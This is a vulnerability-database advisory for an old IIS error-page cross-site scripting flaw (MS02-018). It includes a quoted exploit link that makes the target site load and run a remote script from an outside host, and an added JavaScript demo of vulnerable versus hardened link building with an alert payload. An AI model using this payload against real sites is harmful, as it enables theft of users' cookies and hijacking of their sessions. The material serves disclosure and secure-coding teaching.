Microsoft IIS HTTP Error Page Handling Cross-Site Scripting Vulnerability (MS02-018)

Vulnerability ID: 1106665    Vulnerability type: Input validation
Published: 2002-04-10    Updated: 2005-05-02
CVE ID: CVE-2002-0148    CNNVD ID: CNNVD-200204-015
Platform: Windows    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/21372
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200204-015
|Vulnerability details
Microsoft IIS (Internet Information Server) is the web server software shipped by default with Microsoft Windows. IIS does not properly check user-supplied input when it builds its error pages, which allows an attacker to mount a cross-site scripting attack. Whenever IIS answers a request with HTTP 404 it displays its "404 Not Found" page; the HTML of that page uses client-side script to output a link back to SERVER.TLD (the server that was requested), and that link is assembled from the URL the browser requested without sanitizing it. An attacker can therefore construct a link to a non-existent path on the target server that carries arbitrary HTML and script; when another user follows that link, the embedded script runs in that user's browser in the security context of the vulnerable site. This can let the attacker obtain sensitive data such as cookie-based authentication credentials for the site. Microsoft addressed the issue in security bulletin MS02-018.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/4486/info

A Cross Site Scripting issue exists in some versions of IIS. The HTTP Error Page created by IIS may, under some circumstances, contain HTML content which includes unsanitized user supplied input.

An attacker may construct a link to a vulnerable server such that it exploits this vulnerability. When an innocent user follows this link, the script code will be reproduced by the server, and execute within the context of the vulnerable site. This may result in the exposure of sensitive data and cookie information, or allow the attacker to subvert the content and functionality of the site.

It has been reported that this issue may be exploited to steal cookie-based authentication credentials from users of a number of Microsoft domains/services (such as hotmail, passport, etc.).

A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.

http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath

The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is served by an IIS installation.
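The mechanism behind the link above, modelled as an added example in JavaScript. This is illustration code written for this page, not the actual IIS 404 error page and not code from the advisory: a link-building routine that slices the server name out of document.URL with string indexing and splices it into markup, beside a hardened version that parses the URL with the WHATWG URL parser, keeps only the origin (userinfo before "@" is dropped), refuses non-HTTP schemes, and HTML-escapes what it emits. The sample attack URL is constructed here following the pattern of the advisory's link (payload in the userinfo part, tabs in place of spaces, a plain alert(1) instead of the remote script load); the function names, the assumption that document.URL carries the percent-decoded form, and the payloadSurvives check are all assumptions made for the demonstration.

```javascript
// Added illustration, not IIS's own error page code: a model of an error page
// that rebuilds a "back to the server" link out of document.URL, beside a
// hardened version that never treats URL text as HTML.
'use strict';

// Escape the five characters that matter inside HTML text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE model: take everything between "://" and the next "/" by string
// indexing and splice it straight into markup. Whatever an attacker places in
// the userinfo part of the URL (the text before "@") lands in the page as HTML.
function buildLinkVulnerable(docUrl) {
  const protocolIndex = docUrl.indexOf('://', 4);
  const serverIndex = docUrl.indexOf('/', protocolIndex + 3);
  const urlresult = docUrl.substring(0, serverIndex);                      // scheme://authority
  const displayresult = docUrl.substring(protocolIndex + 3, serverIndex);  // authority only
  return '<a href="' + urlresult + '">' + displayresult + '</a>';
}

// HARDENED model: parse with the WHATWG URL parser, keep only the origin
// (scheme + host + port; userinfo is discarded), refuse non-HTTP schemes,
// and HTML-escape before emitting markup.
function buildLinkHardened(docUrl) {
  const fallback = '<a href="/">this server</a>';
  let u;
  try {
    u = new URL(docUrl);
  } catch (e) {
    return fallback;                      // unparsable input: never echo it
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    return fallback;                      // e.g. javascript: is not a server
  }
  return '<a href="' + escapeHtml(u.origin) + '/">' + escapeHtml(u.host) + '</a>';
}

// Constructed sample input following the advisory's pattern: the HTML payload
// sits in the userinfo part before "@", with tabs in place of spaces.
// (Assumed payload: alert(1); the advisory's version loads a remote script.)
const ATTACK_URL =
  'http://<img\tsrc=""\tonerror="alert(1)">script@YOUR.TLD/SomeNonExistantPath';
const BENIGN_URL = 'http://www.example.com/SomeNonExistantPath';

// True when the builder's output still carries an <img ... onerror=> tag from the URL.
function payloadSurvives(builder, url) {
  return /<img[\s\S]*onerror=/i.test(builder(url));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', buildLinkVulnerable(ATTACK_URL));
  console.log('hardened:  ', buildLinkHardened(ATTACK_URL));
  console.log('payload survives (vulnerable):', payloadSurvives(buildLinkVulnerable, ATTACK_URL));
  console.log('payload survives (hardened):  ', payloadSurvives(buildLinkHardened, ATTACK_URL));
}
```

Run it with node. The vulnerable builder returns markup carrying the <img ... onerror=...> tag verbatim, so any error page that document.write()s that string fires the handler in the site's origin; the hardened builder returns a link to http://your.tld/ with the userinfo gone. Note that the WHATWG parser lowercases the host, so YOUR.TLD comes back as your.tld.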
|References

Source: US-CERT Vulnerability Note: VU#886699
Name: VU#886699
Link: http://www.kb.cert.org/vuls/id/886699
Source: CERT/CC Advisory: CA-2002-09
Name: CA-2002-09
Link: http://www.cert.org/advisories/CA-2002-09.html
Source: MS
Name: MS02-018
Link: http://www.microsoft.com/technet/security/bulletin/ms02-018.asp
Source: BID
Name: 4486
Link: http://www.securityfocus.com/bid/4486
Source: OSVDB
Name: 3339
Link: http://www.osvdb.org/3339
Source: XF
Name: iis-http-error-page-css(8803)
Link: http://www.iss.net/security_center/static/8803.php
Source: CISCO
Name: 20020415 Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
Link: http://www.cisco.com/warp/public/707/Microsoft-IIS-vulnerabilities-MS02-018.shtml
Source: US Government Resource: oval:org.mitre.oval:def:92
Name: oval:org.mitre.oval:def:92
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:92
Source: US Government Resource: oval:org.mitre.oval:def:81
Name: oval:org.mitre.oval:def:81
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:81